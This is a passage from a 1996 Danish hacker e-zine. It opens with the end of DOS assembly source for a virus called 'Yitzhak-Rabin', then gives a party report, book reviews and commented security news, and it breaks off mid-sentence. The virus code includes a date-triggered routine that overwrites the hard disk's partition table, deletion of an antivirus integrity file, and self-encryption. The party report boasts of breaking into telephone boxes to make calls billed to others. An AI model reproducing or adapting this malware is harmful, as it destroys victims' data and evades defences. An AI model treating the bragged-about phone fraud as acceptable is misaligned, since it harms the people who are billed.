warm_reboot:    mov     ah,19h          ; get current drive
		int     21h

		cwd
		mov     cx,1            ; write 1 sector
		lea     bx,logo         ; what to write !
		int     26h
		db      0eah,0f0h,0ffh,0ffh,0ffh  ;Reboot!
virusint9       endp

;***************************** INT 26h ***************************************
virusint26      proc    near
		
		mov     ah,2ah          ; get DOS date!
		int     21h

		cmp     dl,3h           ; 3rd any month Rabins deathday!
		je      kill_mbr
		jne     function26

kill_mbr:       mov     ax,0301h
		sub     bx,bx
		mov     cx,0001h
		mov     dx,0080h
		int     13h             ; write the partition table
		
function26:     jmp     dword ptr cs:[oldint26h]
		iret
virusint26      endp
		
;************************** Delete Anti-vir.dat ******************************
delete_crc      proc    near  
		mov     ax,4301h                ; Clear attributes
		xor     cx,cx
		int     21h
		mov     ah,41h
		lea     dx,tbav_crc
		int     21h
		ret
delete_crc      endp

tbav_crc        db      'anti-vir.dat',00h

encrypt_end:

save_time       dw      0
save_date       dw      0
save_int24      dw      2 dup (?)

logo            db "[ Yitzhak-Rabin 1.00 (c) made by TorNado in Denmark '96 ]"

oldint09h       dd      ?
oldint21h       dd      ?
oldint26h       dd      ?

encrypt_val     dw      0
ctrl_alt_del    equ     53h
orgbuf          db      0cdh,20h,00,00   ; place to save first 4 bytes 
newbuf          db      0e9h,00,00,'R'   ; work on new Entry Point

xor_crypt:      mov     dx,word ptr ds:[bp+encrypt_val]
		lea     si,[bp+encrypt_start]
		mov     cx,(encrypt_end-encrypt_start)/2

xor_loop:       xor     word ptr ds:[si],dx         ;simple ordinary xor-loop
		inc     si                          ;encryption
		inc     si
		loop    xor_loop
		ret
		
fooldeltaoff:   call    $+3
		pop     bp
		sub     bp,offset $ - 1 
		jmp     $+2
		ret                                 

codeend:

yitzhak_rabin   ends
end             start


             ‏S‏M‏E‏R‏S‏H‏‏D‏O‏M‏M‏E‏D‏A‏G‏‏N‏U‏‏#‏5‏‏S‏M‏E‏R‏S‏H‏


                       The Party 95 - hvad gik der galt?
                                 Af Clive Sharp

        Vi i SMERSH havde i lang tid g†et og snakket om The Party '95, og om
hvor fedt det skulle blive. Og det startede da ogs† meget godt. Alt blev arr-
angeret i bund, og Darkman fortalte alle der loggede p† Darkside Connection,
at de SKULLE komme til The Party '95, da det ville blive totalt vildt. Det blev
det bare ikke!

        Det startede den 27/12 kl. 10.00 p† ‌sterport station hvor jeg (Clive
Sharp) og Darkman m›dtes og blev samlet op af Narkobagmanden i hans BMW
(SMERSH-mobilen), og derefter k›rte vi ud til Doggman hvor KTAS-teltet ogs†
blev samlet op. Derefter var det afsted til f‘rgen. F‘rgeoverfarten var en
oplevelse for livet. Folk er IKKE vant til at se 4 hardcore hackere i en BMW,
og da Doggman stod ude p† bild‘kket og testede ledninger, fik han de onde ›jne
fra de andre p† d‘kket (sikkert jyder).

        Vi stoppede i Odense hvor vi indtog vores normale frokostmad (McD og
cola) hvorefter vi fortsatte mod Gylland. Da vi ankom til "party stedet" s† det
rimeligt sejt ud. Massere af mennesker og gang i den. Vi gik inderfor og fandt
Leroy, Bobby Ewing, *Krigeren og 99papa (Deja-vu og Saron var ikke til "part-
yet" [heldige svin -red]). Vi satte vores compere op og kiggede lidt omkring.
Vi fandt ikke andet end W/\r3z KiDS og folk fra "Randers computerklub" eller
hvor det nu var de kom fra. De var ihvertfald en bunke tabere.

        N†, s† pr›vede vi at komme p† netv‘rket. Men nej, det virkede ikke og
deres "teknikker" var ikke til stede. Godt arrangeret drenge! Og s† skete det.
Ganske uprovokeret gik en eller anden tumpe op p† scenen og begyndte at synge.
F›rst troede vi det var en fejl, men vi fandt senere ud af, at det var en der
fik PENGE for at komme og synge. Fat det! Jeg har ALDRIG h›rt noget lyde Sڈ
d†rligt i hele mit liv! Endnu en genistreg fra folkene bag TP '95.

        Mens vi s† sad og fik giga klodser af TP '95 begyndte deres "rave". Jeg
ved ikke hvad det var, men det var IKKE et rave. M†ske en d†rlig kopi. Da blev
vi enige om, at vi ville phreake fra TP '95, bare for at genere arrang›rerne.
Og det gjorde vi s†. Vi startede med at ringe fra sovesalen (midt under deres
"rave"), og vi fik snakket med nogle af vore venner i det store udland. Ganske
bekvemt vil jeg nu sige.

        Men hen ad morgen fik vi nye ide‚r. Nu skulle der ringes i bund. S† vi
stormede udenfor og †bnede en af de JTAS bokse der sad p† v‘ggen (ja, vi har en
"trekants"-n›gle) og s† ringede vi videre. Derefter gik det ud over de omkring-
liggende bygninger, som ogs† vil f† en st›rre tlf-regning n‘ste gang. Vi endte
ved en af de st›rre fordelerbokse (ja, de er sgu' forskellige fra dem p† Sj‘l-
land), som med et diskret spark blev †bnet (vi havde ikke vores dirkes‘t med).
Under denne "udflugt" tog vi massere af billeder, som vi gerne skulle v‘re ud-
givet sammen med dette nummer af Dommedag Nu.

        Ca. kl. 0700 havde vi f†et nok af TP '95, og k›rte hjemad. Vi var til-
bage p† ‌sterport station kl. 1100 den 28/12. Men hvad var der galt med TP '95?
Tjaaa, det var i mine ›jne ikke et "party" p† samme m†de som de "gamle"
party's. Jeg har v‘ret til en del forskellige party's (Dominators-Upfront-Tri-
logy '89 [Randers], Kefrens-Dexion '90 [Falster], Silents-Red Sector '90
[Glostrup], Dexion '90 [Odense], The Party '91 [ڈrs], The Party '92 [ڈrs] og
Chaos Computer Club '94 [Berlin]) og i forhold til dem er TP '95 ikke et party.
P† de ovenst†ende party's skulle man i de fleste tilf‘lde v‘re inviteret for at
kunne komme ind. P† den m†de slipper man for folk som Horsens Computer Klub og
lignende. Der var altid massere af h†rde folk, mens der p† TP '95 ikke engang
var nogle af de h†rde warez folk, og hvor er man s† henne? F›r i tiden blev der
altid vist massere af nye pirat-film og pornofilm. Jeg s† 1 (en) porno-film p†
TP '95! Er det ringe eller hvad?

        Grunden til at TP '95 var s† ringe er nok bare, at arrang›rende var
mere interesserede i at score nogle penge, end de var i at afholde et godt
party. Trist men sandt. Lad os h†be at n‘ste party bliver et "invite only", s†
slipper vi for den h‘r af lamers.


             ‏S‏M‏E‏R‏S‏H‏‏D‏O‏M‏M‏E‏D‏A‏G‏‏N‏U‏‏#‏5‏‏S‏M‏E‏R‏S‏H‏


                              B O G H J ‌ R N E T



                                    Hackers
             David Bischoff, Harper Paperbacks, ISBN 0-06-106375-4
                         L‘st og anmeldt af Clive Sharp

        Jeg var i Chicago's lufthavn, hvor jeg skulle vente i et par timer, da
jeg s† bogen. "Hackers" stod der i bl†t, og foroven stod der, at det nu var en
"major motion picture". Fedt nok t‘nkte jeg, for Deja-vu havde fortalt mig om
et interview, som han havde set p† CNN, som omhandlede en hacker-film, s† det
m†tte v‘re denne [eller The Net -red]. Jeg k›bte den, og gik straks igang med
at l‘se. At sige, at jeg blev skuffet, ville v‘re en mild underdrivelse.

        P† side fem f†r vi at vide, at helten, som hedder noget s† originalt
som "Zero Cool", har lavet en virus, der fik 1507 computere p† Wall Street til
at g† ned. N† ja, han er forresten 11 †r gammel. Herfra gik det ned af bakke.
Jeg ved ikke med jer, men jeg kender IKKE s‘rligt mange b›rn p† 11 †r, der er i
stand til at lave en s† heftig virus (eller bare en virus). S† hacker vores
helt sin nye skoles computer, da han g‘tter sin rektors password. Det ser en af
de andre elever p† skolen, og s† er han lige pludselig med i en hacker-gruppe.
N† ja, glemte jeg at sige, at fire af gruppens medlemmer g† p† skolen? Glemte
jeg ogs† at sige, at et af medlemmerne af gruppen er en pige, som if›lge besk-
rivelsen ligner Claudia Schiffer?

        Lad os tage en lille pause, og regne lidt p† disse tilf‘ldigheder. Hvad
er chancen for, at man p† sin f›rste skoledag, finder en (og senere flere) hac-
kere? De er i mine ›jne ikke s‘rligt store. Jeg gik personligt i skole med en
anden dansk hacker, og der gik 5 †r, f›r jeg fandt ud af, at han hackede. Der-
udover s† er en af hackerne sort (og en anden er mexikaner). Personligt s† har
jeg kun h›rt om 2 sorte hackere, s† her ryger sandsynligheden ned igen. Og til
sidst har vi s† den kvindelige super-hacker-skede. Jeg ved ikke med jer, men
hvis i h›rer om nogle hackere, som tilf‘ldigvis er en total sild, ring! Jeg har
kun h›rt om en (1) kvindelig hacker, men det var sikkert bare et rygte. Og alle
disse dejlige personligheder, de g†r, tilf‘ldigvis, p† den samme skole, jamen
er det ikke bare dejligt. I mine ›jne er sandsynligheden lig 0.0001%, men det
er bare min mening.

        Okay, nu har jeg fortalt om vores helte, og nu g›r "Dark-Side-Hackeren"
sin entre. Manden er i begyndelsen af de 30, og han insistere p† at blive kaldt
"The Plague". Jeg har sj‘ldent h›rt om en st›rre n›rd (m†ske lige Janek & MMJ).
Derudover er der en politimand, der er s† dum, at han f†r Jan S›nderbo Carlsen
til at virke smart, klog og venlig!

        Nok om personerne, nu til plottet (eller mangel p† samme). Vores Dark-
Side-Hacker er igang med at stj‘le penge fra det firma hvor han arbejder, ved
hj‘lp af en slags "orm". Da en af de yngre medlemmer i vores Super-Hacker-Gru-
ppe s† hacker systemet, og tage en kritisk fil, g†r vores Dark-Side-Hacker
amok, og en krig bryder ud mellem ham og vores Super-Hacker-Gruppe. Ind imellem
dette bliver der s† rodet en historie om en virus ind. Men bare rolig, vores
"helte" redder selvf›lgelig hele verden.

        Bogen er sikkert ganske god, hvis man INTET kender til computere. Man
bliver fustreret af de mange tekniske fejl og mangler i plottet. Der er f.eks.
et tidspunkt, hvor en computer bliver angrebet, og i stedet for at hive stikket
ud, s† sidder de og pr›ver at logge folk ud. S† er det at jeg t‘nker: enten er
jeg bare s† smart, at kun JEG kan finde ud af, at hive stikket ud [n‘ppe -red],
ellers s† er der noget galt i plottet [det er der! -red]. En anden irriterende
ting er deres sprog. De taler som warez folk gjorde i 1990, og det er TEMMELIGT
ringe at h›re p†. Der er nogle gode momenter i bogen, men alt for meget er for
ringe lavet. Det spiller bare IKKE.





            The Virus Creation Labs - A Journey Into The Underground
    George C. Smith - American Eagle Publications, Inc - ISBN 0-929408-09-8
                         L‘st og anmeldt af Clive Sharp

        Denne bog er skrevet af manden der laver Crypt Newsletter, og den om-
handler virus-undergrunden. Bogen starter med at vise hvilket medie-hysteri der
var, da Michelangelo-virusen slog til i starten af 1990'erne. Det viser ogs†,
hvor lidt journalisterne vidste om computer-viruser, og hvor meget de blev mis-
ledt af folk som John McAffe og David Solomon. Derefter f†r undergrunden et par
slag i ansigtet. Undergrunde bliver beskyldt for, ikke at lave andet end "str-
ani's" (det vil sige lettere modifikationer til en allerede udgivet virus), men
der bliver dog gjort opm‘rksom p† nogle af de rigtigt gode virus-coders, s†som
Nowhere Man og Priest (tidligere Little Loc). Nowhere Man's Virus Creation Lab
bliver ogs†, mere eller mindre, rost.

        Derefter bliver der brugt rimeligt meget tid p† at hive eksempler frem
p† antivirus-codere, der har ego'er p† st›rrelse med Runde T†rn. Det er ganske
interessant at l‘se om disse folk i CARO (Computer Anti-virus Research Organi-
zation) der er s† selvglade, at selv Don Carlsen virker som en ok mand. Man
h›rer ogs† om deres planer om at nedl‘gge samtlige virus-boards, fordi de er
"farlige". Dette er den samme gruppe som mener, at det skulle v‘re forbudte
b†de at lave og opbevare viruser! Men de m† selvf›lgeligt gerne have viruser,
for de er jo de "gode", og hvordan skal de ellers kunne lave antivirus-
software? De er i mine ›jne en bunke ynkelige personer, som desv‘rre er blevet
meget rige p† at lave antivirus-software.

        S† er det virus-undergrundens tur til (igen) at blive rakket ned. Her
bliver is‘r NuKE rakket ned (lige med undtagelse af Nowhere Man), og der bliver
brugt temmeligt meget tid p† at beskrive mere eller mindre "smarte" medlemmer
af NuKE. Bogen p†st†r, at dette er et udtryk for den nord-amerikanske virus-
scene, lige med undtagelse af et par f† r† programm›ere. Bogen ender med to
interview's taget fra det svenske blad Insane Reality.

        Alt i alt en temmelig god bog, men den er ikke forf‘rdelig lang. Mange
af de hardcore virus-codere gik mere eller mindre amok da bogen udkom, og besk-
yldte forfatteren for at dolke dem i ryggen. Hvordan og hvor han skulle have
gjort det, kan jeg ikke finde ud af, men jeg er jo heller ikke en hardcore
virus-coder [Bogen er ude som ASCII -red].





           Information Warfare, Chaos on the Electronic Superhighway.
           Winn Schwartau, Thunder's Mouth Press, ISBN 1-56025-080-1
                            L‘st og anmeldt af Saron

Her er bogen for personen som vil vide noget om, hvordan man irriterrer sin
nabo mest muligt - ja eller hvem man nu ikke bryder sig om. Begrebet Infor-
mation Warfare d‘kker over mange emner, der har det til f‘lles at de benytter
den nyeste men ikke altid den mest advancerede teknologi. Af sjove ting kan
n‘vnes:

- Industri Spionage
- Hacking
- Modificeret hard og software
- Aflytning af datakommunikation
- Kryptologi og kodebrydning
- Angreb p† personlige informationer
- Magnetiske v†ben

Noget nyt i det? Ja! Hans dommedagsagtige m†de at anskue tingene p†, viser
l‘seren hvor farlige disse v†ben faktisk er n†r det kommer til stykket - og
hvor s†rbart samfundet er.

Et eksempel:
S›ren bryder sig ikke om Per. S›ren kender til Pers CPR-nummer og navn, s†
S›ren kender en god ven, som kan lave falske sygesikringskort. S† nu kan S›ren
sige han hedder Per. Godt nok er et sygesikringskort ikke fuldt ud gyldigt, men
S›ren ved jo ogs† at de fleste godtager det som legimitation. Nu g†r S›ren ned
i Fona og lejer et stort fjernsyn som han stiller hjemme p† sit gulv. Efter et
par m†neder vil Fona gerne se nogle penge fra Per, som intetanende bliver helt
vildt forvirret og han bruge 30-40 opkald, samtaler med diverse personer og
andet p† at overbevise Fona om han er uskyldig.
S›ren er ikke tilfreds endnu, s† han forts‘tter med at k›be sjove ting, og
inden l‘nge st†r Per i RKI. S›ren ved nu hvor let det er at aflytte Pers
telefon, s† det begynder han ogs† p† - og med hans dertil indk›bte Van Eck ting
begynder han at 'aflytte' hans computersk‘rm. Per er efterh†nden lettere ked af
det, men ved jo ikke hvem det er, som irriterrer ham, og begynder frustreret at
tude. S›ren syntes nu at det er lidt synd for Per, s† han v‘lger at sende ham
en f›dselsdagsgave i form af et spil til hans computer. Juhu siger Per, og
s‘tter det, igen intetanende, i hans computer. Og vupti, Per har nu ikke kun
f†et en diskette, men ogs† en personlig virus, der i de f›lgende uger langsomt
spiser hans computer op - uden Per fatter en balle! Det sidste S›ren gider, er
at lave ged i Pers bankkonti og skatteberegninger (der ligger p† kommunens
hackede computer). Efterh†nden som Per bliver mere og mere fortvivlet daler
S›rens interesse for Per sig, og han offentligg›rer samtlige informationer han
har om Per p† diverse BBS'er, og s† glemmer han om den sag. Vidende om alle de
ting han sparrede Per for l‘gger han Information Warfare fra sig igen og g†r en
tur, intetanende om hvordan Pers liv har det for tiden....

Nej, bogen er ikke en opskrift p†, hvordan man g›r. Den fort‘ller om mulig-
hederne, men uden at fort‘lle om metoderne (i dybden). Selvom man har v‘ret
inde i branchen en r‘kke †r, giver den et ret skr‘mmende billede af, hvordan
man, med den rette viden, kan f›re krig - p† en ganske ufarlig m†de (for en
selv).

Bogen henvender sig til alle som kan engelsk, og som kan finde ud af at bladre
430 sider igennem. Ingen tekniske foruds‘tninger er kr‘vet, da den hele tiden
bev‘ger sig p† et meget teoretisk (og overfladisk) plan.

Interessant, underholdende og ganske l‘rerig l‘sning til de m›rke vintern‘tter.


             ‏S‏M‏E‏R‏S‏H‏‏D‏O‏M‏M‏E‏D‏A‏G‏‏N‏U‏‏#‏5‏‏S‏M‏E‏R‏S‏H‏


           N Y H E D E R   F R A   D E N   D A N S K E   P R E S S E



                      S†dan beskytter du dig mod HACKERE.
                         Rapport Classic - Oktober 1995
                                 Af Clive Sharp

        -Et godt password: t8Y/x? Det er let at forhindre at ubudne g‘ster
snylter p† din tilkobling til f.eks. Internet. Men kun hvis du t‘nker dig om,
n†r du v‘lger password. Dit kodeord skal:
        - V‘re ren volapyk - alts† ingen ord eller navne.
        - Indeholde b†de store og sm† bogstaver.
        - Best† af andre tegn end blot bogstaver.
        - ’ndres j‘vnligt, f.eks. en gang om m†neden.
        - Ikke skrives ned. L‘r det udenad.
        - Holdes hemmeligt. Ogs† for mor og k‘resten.
        Kodeord som "porsche", "tuborg" og "madonna" er alt for nemme at g‘tte.
Is‘r af dem, der kender lidt til dine interesser. Et godt password kunne der-
imod v‘re "t8Y/x?l". Hvis du da ellers selv kan huske det...
--------
S† er det bevist! Jeg har altid sagt, at der er seri›se artikler i pornoblade,
og her er s† beviset! ENDNU en godt grund til at k›be Rapport [hmmm -red].





                             Ung hacker arresteret.
                        ComputerWorld - 5. Oktober 1995
                                 Af Clive Sharp

        New York: En 16-†rig dreng fra New York er blevet arresteret og sigtet
for at have hacket sig ind p† telefonlinier hos telefonselskaberne og deres
kunder og foretaget langdistance-opkald for tusindvis af dollars. Drengen,
Daniel Swerdloff, mist‘nkes for at v‘re hovedmanden bag en bande p† 40 - 50
hackere i USA og Canada. Efter sigende har han sin viden fra hyppig f‘rden p†
Internet og fra undergrundsblade som "2600: The Hackers Quarterly" og risikerer
nu op til otte †rs f‘ngsel. Daniels for‘ldre havde s† sent som dagen inden an-
holdelsen f†et mistanke om, at han var igang med kriminelle aktiviteter, og
moderen havde resolut kappet telefonforbindelsen ud af huset og fjernet tasta-
turet fra hans computer, men da var det alts† for sent.
--------
Jeg ville godt vide, hvor de f†r disse fantastisk gode historier fra. De virker
ogs† yderst seri›se: 40 - 50 hackere, ja selvf›lgeligt, intet mindre kan g›re
det. Jeg ville bare godt vide, hvad betegnelsen "hackere" d‘kker over i denne
sammenh‘ng???





                           Ny virus skaber forvirring
                        ComputerWorld - 5. Oktober 1995
                                 Af Clive Sharp

        En ny virus, der er knyttet til Microsoft Word, har set dagens lys. Den
overf›res i helt almindelige dokumenter og bliver eventuelt hentet ned fra
Internet eller spredt som elektronisk post.

        Tidligere var computer-virus afh‘ngige af styresystemet p† computeren.
Bestemte virus kunne kun komme p† bestemte maskiner. Det bet›d, at havde man en
Macintosh, var man fri for at t‘nke p† alle de virusser, der h‘rgede p† PC'er.
De seneste eksempler p† virus f›lger dokumenter og er ligeglade med, hvilken
type computer programmet k›rer p†. Dermed er selve dokumentet blevet farligt.
Den platform uafh‘ngige virus er den s†kaldte Winword.Concept. Trods forlydende
i radioen er denne virus ganske uskadelig og nem at opdage.

        Sikkerhedsr†dgiver S›ren Olsen fra Instituttet for Datasikkerhed [suk!]
mener, at virksomhederne fremover alligevel skal v‘re endnu mere opm‘rksomme p†
sikkerheden i deres systemer: -Virksomhederne b›r kontrollere alt, som de lader
komme inden for deres system. F›r skulle man kun kontrollere, n†r man indlagde
programmer, men med den nye virus kan selv uskyldige dokumenter indeholde
virus. Den nye type virus er knyttet til et dokument og bygger p† de auto-
matiske instruktionss‘t, som brugere af tekstbehandlingsv‘rkt›jer, selv kan de-
finere - de s†kaldte makroer. Da virussen ligger som en makro, g›r det den b†de
nem at finde og fjerne, fordi Word har rutiner til b†de at redigere makroer og
fjerne dem.

        Det amerikanske institut for datasikkerhed (NCSA) har unders›gt denne
virus og fundet ud af, at selv om den kan overf›res mellem forskellige maskin-
typer, kan den kun overf›res, hvis maskinen udveksler dokumenter, der er skre-
vet i Microsoft Word version 6.0 eller senere. Tilmed g‘lder, at det kun er
engelsk-sprogede udgaver af Word, der vil blive ramt at virussen.

        S›ren Jensen [hed han ikke Olsen f›r???] g›r opm‘rksom p†, at makro-
virus er en forholdsvis ny ting hidtidige antivirus-programmer ikke har taget
h›jde for, men peger p†, at problemet f›rst og fremmest er aktuelt for de virk-
somheder, der b†de har direkte opkobling til for eksempel Internet og derudover
har eget netv‘rk i i organisationen. Han mener desuden, at virksomhederne
regelm‘ssigt skal kontrollere deres systemer for virus og eventuelt indf›re
helt nye rutiner, der tager h›jde for de nye virus.

        Microsoft har allerede udsendt et antivirusprogram, der skulle hj‘lpe
p† et inficeret system. Programmet kan hentes ned over Internet fra Microsofts
hjemmeside: "http://www.microsoft.com". If›lge ComputerWorld US findes der
flere eksempler p† makrovirus. Senest er der dukket et eksempel op, der kaldes
Wordmacro.Nuclear, som kan g›re skade, n†r systemet er inficeret. Som en mere
kuri›s ting udskriver denne virus beskeden: "And Finally I would like to say:
STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC", n†r man har skrevet et
dokument ud. Hvis man derudover k›re Word den 5. april i et vilk†rligt †r vil
styrefilen COMMAND.COM blive slettet.





                            Sikkerhed p† Internettet
              Jyllandsposten, Martin L. Hansen - 16. Oktober 1995
                                 Af Clive Sharp

        Internettet er hot. Vi fr‘ser ud af informationsmotorvejen med stor
hastighed. Men hvad med sikkerheden, autov‘rnet og airbagen, der skal sikre os,
at vi ikke kommer galt afsted? For eksempel er det muligt via programmet Finger
der er et almindeligt service-v‘rkt›j, at finde frem til andre brugere og se
hvorn†r vedkommende har logget sig ind, om de har f†et post og om de har l‘st
deres post. Der er dog nogle Internet-udbydere, der har lukket af for mulig-
heden at finde frem til andre brugere via Finger. Finger blev oprindeligt lavet
netop til at finde frem til brugere p† andre computere for at kunne kommunikere
med dem. Det er derfor en smagssag, om disse oplysninger er f›lsomme eller man
anser dem som en facilitet for andre brugere. Det rejser dog sp›rgsm†let
omkring sikkerheden p† Internettet, og hvem der har ansvaret for at sikkerheden
er i orden.

        EGET ANSVAR.
        "Brugerne har eget ansvar for deres Internet-opkobling. Det eneste vi
s›rger for, er at levere en forbindelse. Hvordan de enkelte brugere anvender
Internet og herunder hvordan de beskytter sig er deres egen sag", siger Stig
Berthelsen, produktchef hos Dana Data. J›rgen Bo Madsen [jaaa, skoen, vores
helt!!] fra UNI-C, der arbejder med sikkerhedsproblemer, er enig med Stig Ber-
thelsen. "Sikkerhedsproblemet ligger ude hos brugerne af Internet og deres an-
vendelse af nettet. Hvis man sender f›lsomme informationer over nettet, ville
det v‘re dumt ikke at kryptere dem. Det ville v‘re det samme som at sende en
pengetransport gennem K›benhavn i en †ben lastvogn", siger J›rgen Bo Madsen,
der har en s†kaldt CERT-funktion i Danmark. CERT st†r for Computer Emergency
Response Team, der kooridnere EDB-sikkerhedsproblemer b†de i Danmark og videre
i udlandet [Nok is‘r i udlandet].

        KEDELIG SIKKERHED.
        I ›jeblikket er der ikke de store sikkerhedsm‘ssige problemer med
Internettet. J›rgen Bo Madsen forudser dog, at n†r Internettet for alvor bliver
kommercielt, s† bliver de sikkerhedsm‘ssige problemer st›rre. Men til den tid
vil der v‘re udviklet krypteringsalgoritmer (hvor data bliver gjort ul‘seligt
for uvedkommende), og det arbejde er allerede igang. Blandt andet, er der kom-
met sikkerhedsversioner af de popul‘re programmer Mosaic og Netscape, der
bruges til at navigere p† Internettet. De amerikanske versioner er sikkerheds-
m‘ssigt forsvarlige at bruge til handel p† Internettet, mens der er fundet hul-
ler i de europ‘iske versioner. I forbindelse med kryptering af informationer
findes der allerede v‘rkt›jer, der kan bruges til dette. PGP, der st†r for
Pretty Good Privacy, er et v‘rkt›j, der er velegnet til kryptering af E-mail.
Til st›rre datam‘ngder er for eksempel DES, Data Encryption Standard, velegnet.





                        N†r politiet er med p† en lytter
                Jyllandsposten, Niels Mulvad - 16. Oktober 1995
                                 Af Clive Sharp

        KRYPTERING
        Politiet kan nemt lytte med og kigge i folks elektroniske post. Is‘r
n†r man bruger moderne teknik. Borgernes og virksomhedernes forsvar mod at
blive kigget over skulderen hedder kryptering. Det kan bevare brevhemmelighed
og samtalehemmelighed, men det ser ud til, at en r‘kke europ‘iske lande kan f†
held til at forhindre kryptering. Forel›big har Danmark holdt sig uden for den
politiske debat.

        Amerikanske teleselskaber tilbyder i dag kunderne at k›be telefoner,
der kan kryptere samtalerne. Telefonsnakken l›ber da gennem nettet i en for-
vasket form, som ingen kan lytte med p†, bortset fra modtageren. Det forhindre
dog ikke politiet i at f† adgang til samtalen. En offentlig n›gle til at bryde
krypteringen bliver gemt, og den kan politiet f† udleveret, hvis det kan stille
med en dommerkendelse. Samtidig er der sammen med den hemmelige overf›rsel
sendt en anden n›gle, og begge n›gler er n›dvendige for at overs‘tte det for-
vanskede til et forst†eligt sprog.

        VڈBEN I USA.
        Det vil sige, at politiet f›rst skal optage den forvanskede samtale,
derefter skaffe sig n›glen via en dommerkendelse, og s† kan man h›re, hvad der
er blevet sagt. Eller hvis der er tale om dataoverf›rsel af tekst, kan man
overs‘tte teksten. Systemet kan ogs† bruges uden for USA, hvis der er tale om
lande, der t‘ller som stormagtens allierede. Andre kan ikke f† lov at bruge
systemet, fordi krypterings-systemer i USA er klassificeret som v†ben af 2.
grad. Teknisk kaldes systemet for Escrowed Key Encryption, og det bliver af
Clinton administrationen betragtet som den rette balance mellem at sikre borg-
erne og forretningslivet p† den ene side og politiets mulighed for at bek‘mpe
kriminalitet p† den anden.

        EUROPA BEGYNDT.
        I Europa er diskussionen f›rst lige begyndt. Forel›big betragter man
kryptering i forbindelse med rene betalingssystemer for i orden, mens der er
st‘rke kr‘fter i gang for at forbyde kryptering af tekst og samtaler. "Skulle
vi indf›re et generelt system i Europa kunne man formentlig g›re det for om-
kring 500 kroner pr. telefon. Men ingen t›r at g† i gang, f›r den politiske
situation af afklaret", siger direkt›r Peter Landrock, Cryptomathic. Han er
lektor i matematik og har udviklet en lang r‘kke af de professionelle krypter-
ingssystemer, der anvendes i Danmark og udlandet. Til n‘ste for†r skal han for
eksempel lede et halv†rs projekt p† Isaac Newton Institute for Matemathical
Sciences p† Cambridge Universitet, hvor 70 forskere fra hele verden meget mod
efterretningstjenesternes ›nsker, skal studere krypteringssystemer.

        I matematikernes sprog hedder det hurtige algoritmer til enkryptering
med henblik p† hemmeligholdelse. Ideen er, at metematikere er nogle af de bed-
ste til at finde matematiske problemer, der ikke er l›st gennem tusinde af †r.
Netop de sv‘reste problemer egner sig bedst som basis for krypteringssystemer,
som samtidigt kan arbejde meget hurtigt.

        PRIMTAL.
        I Peter Landrocks egne systemer har han typisk taget udgangspunkt i
primtal p† op til 100 cifre. Der findes ikke en matematisk model til at finde
ud af hvilken to primtal, der ganget med hinanden f›rer til et bestemt tal. Tag
for eksempel tallet 2773, der er et produkt af 47 gange 59. Fra tallet 2773 er
det umuligt at regne sig tilbage til de to tal. Man kan kun finde de to tal ved
at pr›ve sig frem. Og n†r man kommer op i primtal p† 100 cifre er det praktisk
umuligt at bryde koden. Det ved de teoretiske matematikere og derfor er de nor-
malt bedre til at udarbejde "ubrydelige" krypteringssystemer end efterretnings-
tjenesterne [Ja, for de bruger jo ikke matematikere, vel??].

        "Men disse systemer er selvf›lgeligt ikke mere sikker, end hvis der en
gang kommer en matematiker, der kan l›se g†den, s† kan han ogs† bryde koderne.
Men det er alts† ikke sket i flere tusinde †r", siger Peter Landrock. I hans
system bliver de to primtal udvalgt tilf‘ldigt af systemet selv, og derfor er
der ingen, selv ikke i hans firma, der kender koderne. "Der er tale om et helt
sikkert system, hvor man kun kan l‘se eller lytte til det afsendte, hvis man
har de rigtige n›gler. Man kan altid v‘re sikker p† afsenderens identitet. Det
kan ogs† bruges som en elektronisk underskrift, og det g›res allerede af en
r‘kke private firmaer og personer i Danmark", fort‘ller han.

        DANSK TAVSHED.
        I den europ‘iske debat har Danmark forel›big holdt sig tavs. I Frankrig
er der forbud mod at anvende Kryptering, fordi der er tradition for, at det
franske efterretningsv‘sen m† lytte med p† samtaler ind og ud af landet, uden
f›rst at skulle have fat i en dommerkendelse. I Storbritannien er der samme
tradition, men her er meningerne delte. Man vil ikke hindre kryptering, men
›nsker at undg† eksport af krypteringsteknik. I Tyskland skal politiet kunne
lytte med p† de offentlige net. I Holland har man behandlet et forslag om for-
bud mod kryptering, men det faldt v‘k. I Belgien overvejes et forslag om for-
bud.

        EU-r†det har kort f›r †rsskiftet vedtaget regler, der skal forhindre
udf›rsel af varer og teknologier med dobbelt-anvendelse. De regler er efter-
f›lgende, nemlig den 13. juni i †r, udm›ntet i Danmark i form af en bekendtg›r-
else, hvor man ogs† omtaler s‘rlige f›lsomme produkter, der ikke engang m† sen-
des til andre medlemslande i EU, med mindre man har en s‘rlig tilladelse. P†
den liste optr‘der tungt vand, plutonium, uran og alts† krypteringsudstyr, der
g†r videre end beskyttelse af banktransaktioner. Netop krypteringssystemerne
har v‘ret det mest f›lsomme i debatten.

        POLITISK STILLING.
        "Vi vil se p† en henvendelse fra sag til sag. Vi vil ikke acceptere et
frit salg af systemerne, men skal i hvert tilf‘lde se, hvad k›beren skal bruge
systemet til. Hvis vi er overbevist om, at det er til civil brug, giver vi til-
ladelsen", siger kontorchef Bjarne Bitsch, Erhvervsministeriet. Det er Erhverv-
sministeriet, der skal give tilladelser i Danmark. Han oplyser, at Danmark gen-
erelt st›tter tanken om brevhemmeligheder, men at man i EU-regi endnu ikke har
taget en debat om kryptering og brug af en Escrowed-l›sning.

        "Men der er behov for, at vi i Danmark tager politisk stilling til, om
vi skal have en Escrowed-l›sning, og for at vi begynder at pr‘ge debatten i
Europa", siger Peter Landrock. Ellers kan det let blive den Franske tankegang
der sl†r igennem, som han siger. Det betyder, at kryptering bliver gjort s†
besv‘rligt som muligt for borgerne. "Og i virkligheden er det absurd. For de
storkriminelle har ikke besv‘r med at skaffe sig krypteringssystemer. De fylder
intet og kan let smugles fra et land til et andet. S† et forbud eller en besv‘r-
ligg›relse rammer stort set kun de lovlydige", siger Peter Landrock.

        BORGERKORTET.
        Han har en anden pointe i forbindelse med Escrowed. Hvis danskerne
siger ja til borgerkortet og bagefter vedtager at g† ind for Escrowedmodellen,
risikerer vi, at skulle lave alle borgerkortene om igen. Det har man selvf›lge-
ligt set f›r med pas, k›rekort og sygesikringskort. Men det koster, n†r alle
borgerne skal have skiftet kort. "Borgerkortet drejer sig ogs† om at overf›re
private oplysninger. Derfor vil det v‘re naturligt at have samme sikkerheds-
modeller i det kort som ved telefonsamtaler og dataoverf›rsler", fastsl†r Peter
Landrock.





                            Krypto-politik til debat
                          Politiken - 19. Oktober 1995
                                 Af Clive Sharp

        Sp›rgsm†let om, hvordan man sikre elektronisk post mod aflytning, er
